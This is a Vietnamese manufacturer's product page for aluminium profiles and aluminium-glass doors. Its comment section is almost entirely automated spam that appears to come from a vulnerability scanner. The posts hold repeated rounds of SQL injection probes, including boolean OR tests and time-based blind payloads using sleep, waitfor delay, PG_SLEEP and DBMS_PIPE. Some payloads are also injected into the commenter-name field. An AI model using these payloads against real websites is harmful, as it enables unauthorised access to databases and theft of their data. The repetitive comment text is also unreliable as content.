Nhôm thanh định hình

Nhôm thanh định hình

Nhôm thanh định hình

Giới thiệu Sản phẩm
Hãng sản xuất
Nhà phân phối

Các sản phẩm của "Chi nhánh Công ty CP Cơ khí Đông Anh Licogi – Nhà máy nhôm Đông Anh" tham gia cam kết 3k:

1.         Sản phẩm nhôm định hình sơn tĩnh điện, phủ film

2.         Sản phẩm nhôm định hình anốt, mạ màu, phủ bóng E.D

3.         Sản phẩm kết cấu nhôm: cửa, vách nhôm kính.

Bình luận

Bình luận
ZMskyuza
01:41:55 - 01.06.2024

555

ZMskyuza
01:42:00 - 01.06.2024

555

ZMskyuza
01:42:01 - 01.06.2024

555

ZMskyuza
01:42:16 - 01.06.2024

555

ZMskyuza
01:42:17 - 01.06.2024

555

ZMskyuza
01:42:18 - 01.06.2024

555

ZMskyuza
01:42:41 - 01.06.2024

555

ZMskyuza
01:42:41 - 01.06.2024

555

ZMskyuza
01:42:42 - 01.06.2024

vemqK7Gw

ZMskyuza
01:42:42 - 01.06.2024

-1 OR 2+382-382-1=0+0+0+1 --

ZMskyuza
01:42:42 - 01.06.2024

-1 OR 2+558-558-1=0+0+0+1

ZMskyuza
01:42:42 - 01.06.2024

-1' OR 2+419-419-1=0+0+0+1 --

ZMskyuza
01:42:42 - 01.06.2024

-1' OR 2+187-187-1=0+0+0+1 or 'iwtodvv2'='

ZMskyuza
01:42:42 - 01.06.2024

-1" OR 2+600-600-1=0+0+0+1 --

ZMskyuza
01:42:44 - 01.06.2024

if(now()=sysdate(),sleep(15),0)

ZMskyuza
01:42:45 - 01.06.2024

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

ZMskyuza
01:42:45 - 01.06.2024

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

ZMskyuza
01:42:46 - 01.06.2024

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

ZMskyuza
01:42:47 - 01.06.2024

-1; waitfor delay '0:0:15' --

ZMskyuza
01:42:48 - 01.06.2024

-1); waitfor delay '0:0:15' --

ZMskyuza
01:42:49 - 01.06.2024

-1)); waitfor delay '0:0:15' --

ZMskyuza
01:42:50 - 01.06.2024

1 waitfor delay '0:0:15' --

ZMskyuza
01:42:52 - 01.06.2024

539ryooM'; waitfor delay '0:0:15' --

ZMskyuza
01:42:52 - 01.06.2024

oY1Gj7Ao'); waitfor delay '0:0:15' --

ZMskyuza
01:42:53 - 01.06.2024

9PjeUARo')); waitfor delay '0:0:15' --

ZMskyuza
01:42:54 - 01.06.2024

-5 OR 963=(SELECT 963 FROM PG_SLEEP(15))--

ZMskyuza
01:42:54 - 01.06.2024

-5) OR 392=(SELECT 392 FROM PG_SLEEP(15))--

ZMskyuza
01:42:55 - 01.06.2024

-1)) OR 455=(SELECT 455 FROM PG_SLEEP(15))--

ZMskyuza
01:42:56 - 01.06.2024

F83aiLLY' OR 914=(SELECT 914 FROM PG_SLEEP(15))--

ZMskyuza
01:42:57 - 01.06.2024

ZdBfaf7u') OR 592=(SELECT 592 FROM PG_SLEEP(15))--

ZMskyuza
01:42:58 - 01.06.2024

vtC6vp3u')) OR 467=(SELECT 467 FROM PG_SLEEP(15))--

ZMskyuza
01:42:59 - 01.06.2024

555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

ZMskyuza
01:43:00 - 01.06.2024

555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

ZMskyuza
01:43:00 - 01.06.2024

1'"

ZMskyuza
01:43:00 - 01.06.2024

1����%2527%2522

ZMskyuza
01:43:00 - 01.06.2024

@@dR7aU

ZMskyuza
01:43:01 - 01.06.2024

555

ZMskyuza
01:43:02 - 01.06.2024

555

ZMskyuza
01:43:03 - 01.06.2024

555

ZMskyuza
01:43:03 - 01.06.2024

555

ZMskyuza
01:43:03 - 01.06.2024

555

ZMskyuza
01:43:03 - 01.06.2024

555

ZMskyuza
01:43:03 - 01.06.2024

555

ZMskyuza
01:43:03 - 01.06.2024

555

ZMskyuza
01:43:04 - 01.06.2024

555

ZMskyuza
01:43:05 - 01.06.2024

555

ZMskyuza
01:43:06 - 01.06.2024

555

ZMskyuza
01:43:07 - 01.06.2024

555

ZMskyuza
01:43:07 - 01.06.2024

555

ZMskyuza
01:43:08 - 01.06.2024

555

ZMskyuza
01:43:09 - 01.06.2024

555

ZMskyuza
01:43:10 - 01.06.2024

555

ZMskyuza
01:43:11 - 01.06.2024

555

ZMskyuza
01:43:12 - 01.06.2024

555

ZMskyuza
01:43:13 - 01.06.2024

555

ZMskyuza
01:43:14 - 01.06.2024

555

ZMskyuza
01:43:14 - 01.06.2024

555

ZMskyuza
01:43:14 - 01.06.2024

555

ZMskyuza
01:43:14 - 01.06.2024

555

ZMskyuza
01:43:15 - 01.06.2024

555

ZMskyuza
01:43:16 - 01.06.2024

555

htCWUvg8
01:43:17 - 01.06.2024

555

-1 OR 2+586-586-1=0+0+0+1 --
01:43:17 - 01.06.2024

555

-1 OR 2+698-698-1=0+0+0+1
01:43:18 - 01.06.2024

555

-1' OR 2+219-219-1=0+0+0+1 --
01:43:18 - 01.06.2024

555

-1' OR 2+454-454-1=0+0+0+1 or 'aF5q1IcM'='
01:43:18 - 01.06.2024

555

-1" OR 2+718-718-1=0+0+0+1 --
01:43:18 - 01.06.2024

555

if(now()=sysdate(),sleep(15),0)
01:43:19 - 01.06.2024

555

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
01:43:19 - 01.06.2024

555

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
01:43:21 - 01.06.2024

555

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
01:43:22 - 01.06.2024

555

1 waitfor delay '0:0:15' --
01:43:23 - 01.06.2024

555

SkTVNEjq'; waitfor delay '0:0:15' --
01:43:24 - 01.06.2024

555

QQzGIpJx'); waitfor delay '0:0:15' --
01:43:26 - 01.06.2024

555

urgy9YPq')); waitfor delay '0:0:15' --
01:43:26 - 01.06.2024

555

PZpSia0f' OR 968=(SELECT 968 FROM PG_SLEEP(15))--
01:43:28 - 01.06.2024

555

pM1uQ2DN') OR 50=(SELECT 50 FROM PG_SLEEP(15))--
01:43:29 - 01.06.2024

555

GYyuCXbe')) OR 446=(SELECT 446 FROM PG_SLEEP(15))--
01:43:30 - 01.06.2024

555

ZMskyuza'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
01:43:30 - 01.06.2024

555

1'"
01:43:30 - 01.06.2024

555

1����%2527%2522
01:43:30 - 01.06.2024

555

@@aIRyo
01:43:30 - 01.06.2024

555

ZMskyuza
01:48:07 - 01.06.2024

555

ZMskyuza
01:48:09 - 01.06.2024

555

ZMskyuza
01:48:10 - 01.06.2024

555

ZMskyuza
01:48:28 - 01.06.2024

555

ZMskyuza
01:48:29 - 01.06.2024

555

ZMskyuza
01:48:30 - 01.06.2024

kpgiMJjI

ZMskyuza
01:48:30 - 01.06.2024

-1 OR 2+360-360-1=0+0+0+1 --

ZMskyuza
01:48:30 - 01.06.2024

-1 OR 2+125-125-1=0+0+0+1

ZMskyuza
01:48:30 - 01.06.2024

-1' OR 2+123-123-1=0+0+0+1 --

ZMskyuza
01:48:30 - 01.06.2024

-1' OR 2+853-853-1=0+0+0+1 or 'X1XeUVMU'='

ZMskyuza
01:48:30 - 01.06.2024

-1" OR 2+881-881-1=0+0+0+1 --

ZMskyuza
01:48:31 - 01.06.2024

if(now()=sysdate(),sleep(15),0)

ZMskyuza
01:48:32 - 01.06.2024

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

ZMskyuza
01:48:32 - 01.06.2024

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

ZMskyuza
01:48:34 - 01.06.2024

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

ZMskyuza
01:48:35 - 01.06.2024

-1; waitfor delay '0:0:15' --

ZMskyuza
01:48:35 - 01.06.2024

-1); waitfor delay '0:0:15' --

ZMskyuza
01:48:37 - 01.06.2024

-1)); waitfor delay '0:0:15' --

ZMskyuza
01:48:38 - 01.06.2024

1 waitfor delay '0:0:15' --

ZMskyuza
01:48:38 - 01.06.2024

P3J6u1oN'; waitfor delay '0:0:15' --

ZMskyuza
01:48:40 - 01.06.2024

oOYNUG5s'); waitfor delay '0:0:15' --

ZMskyuza
01:48:40 - 01.06.2024

7iKHbmQH')); waitfor delay '0:0:15' --

ZMskyuza
01:48:41 - 01.06.2024

-5 OR 842=(SELECT 842 FROM PG_SLEEP(15))--

ZMskyuza
01:48:42 - 01.06.2024

-5) OR 600=(SELECT 600 FROM PG_SLEEP(15))--

ZMskyuza
01:48:43 - 01.06.2024

-1)) OR 370=(SELECT 370 FROM PG_SLEEP(15))--

ZMskyuza
01:48:43 - 01.06.2024

OzXTMMp1' OR 140=(SELECT 140 FROM PG_SLEEP(15))--

ZMskyuza
01:48:44 - 01.06.2024

Leg0UXrW') OR 26=(SELECT 26 FROM PG_SLEEP(15))--

ZMskyuza
01:48:45 - 01.06.2024

motPWoge')) OR 808=(SELECT 808 FROM PG_SLEEP(15))--

ZMskyuza
01:48:46 - 01.06.2024

555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

ZMskyuza
01:48:47 - 01.06.2024

555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

ZMskyuza
01:48:47 - 01.06.2024

1'"

ZMskyuza
01:48:47 - 01.06.2024

1����%2527%2522

ZMskyuza
01:48:47 - 01.06.2024

@@Nh3Rw

ZMskyuza
01:48:48 - 01.06.2024

555

ZMskyuza
01:48:49 - 01.06.2024

555

ZMskyuza
01:48:50 - 01.06.2024

555

ZMskyuza
01:48:50 - 01.06.2024

555

ZMskyuza
01:48:50 - 01.06.2024

555

ZMskyuza
01:48:50 - 01.06.2024

555

ZMskyuza
01:48:50 - 01.06.2024

555

ZMskyuza
01:48:50 - 01.06.2024

555

ZMskyuza
01:48:51 - 01.06.2024

555

ZMskyuza
01:48:52 - 01.06.2024

555

ZMskyuza
01:48:53 - 01.06.2024

555

ZMskyuza
01:48:54 - 01.06.2024

555

ZMskyuza
01:48:55 - 01.06.2024

555

ZMskyuza
01:48:56 - 01.06.2024

555

ZMskyuza
01:48:57 - 01.06.2024

555

ZMskyuza
01:48:59 - 01.06.2024

555

ZMskyuza
01:49:00 - 01.06.2024

555

ZMskyuza
01:49:01 - 01.06.2024

555

ZMskyuza
01:49:02 - 01.06.2024

555

ZMskyuza
01:49:02 - 01.06.2024

555

ZMskyuza
01:49:02 - 01.06.2024

555

ZMskyuza
01:49:02 - 01.06.2024

555

ZMskyuza
01:49:02 - 01.06.2024

555

ZMskyuza
01:49:02 - 01.06.2024

555

ZMskyuza
01:49:03 - 01.06.2024

555

Yi2gYKCI
01:49:03 - 01.06.2024

555

-1 OR 2+452-452-1=0+0+0+1 --
01:49:03 - 01.06.2024

555

-1 OR 2+582-582-1=0+0+0+1
01:49:03 - 01.06.2024

555

-1' OR 2+68-68-1=0+0+0+1 --
01:49:03 - 01.06.2024

555

-1' OR 2+339-339-1=0+0+0+1 or 'AeW01zNG'='
01:49:04 - 01.06.2024

555

-1" OR 2+960-960-1=0+0+0+1 --
01:49:04 - 01.06.2024

555

if(now()=sysdate(),sleep(15),0)
01:49:04 - 01.06.2024

555

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
01:49:05 - 01.06.2024

555

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
01:49:05 - 01.06.2024

555

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
01:49:05 - 01.06.2024

555

1 waitfor delay '0:0:15' --
01:49:05 - 01.06.2024

555

te3viN0M'; waitfor delay '0:0:15' --
01:49:06 - 01.06.2024

555

zZyh1xIF'); waitfor delay '0:0:15' --
01:49:07 - 01.06.2024

555

WIX3OE8w')); waitfor delay '0:0:15' --
01:49:07 - 01.06.2024

555

zoHRkV1R' OR 164=(SELECT 164 FROM PG_SLEEP(15))--
01:49:08 - 01.06.2024

555

dvBTn6xK') OR 899=(SELECT 899 FROM PG_SLEEP(15))--
01:49:08 - 01.06.2024

555

oyYA6bx3')) OR 894=(SELECT 894 FROM PG_SLEEP(15))--
01:49:09 - 01.06.2024

555

ZMskyuza'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
01:49:09 - 01.06.2024

555

1'"
01:49:09 - 01.06.2024

555

1����%2527%2522
01:49:09 - 01.06.2024

555

@@5LlHy
01:49:09 - 01.06.2024

555

ZMskyuza
01:52:22 - 01.06.2024

555

ZMskyuza
01:53:16 - 01.06.2024

555

ZMskyuza
01:53:40 - 01.06.2024

555

ZMskyuza
01:53:46 - 01.06.2024

555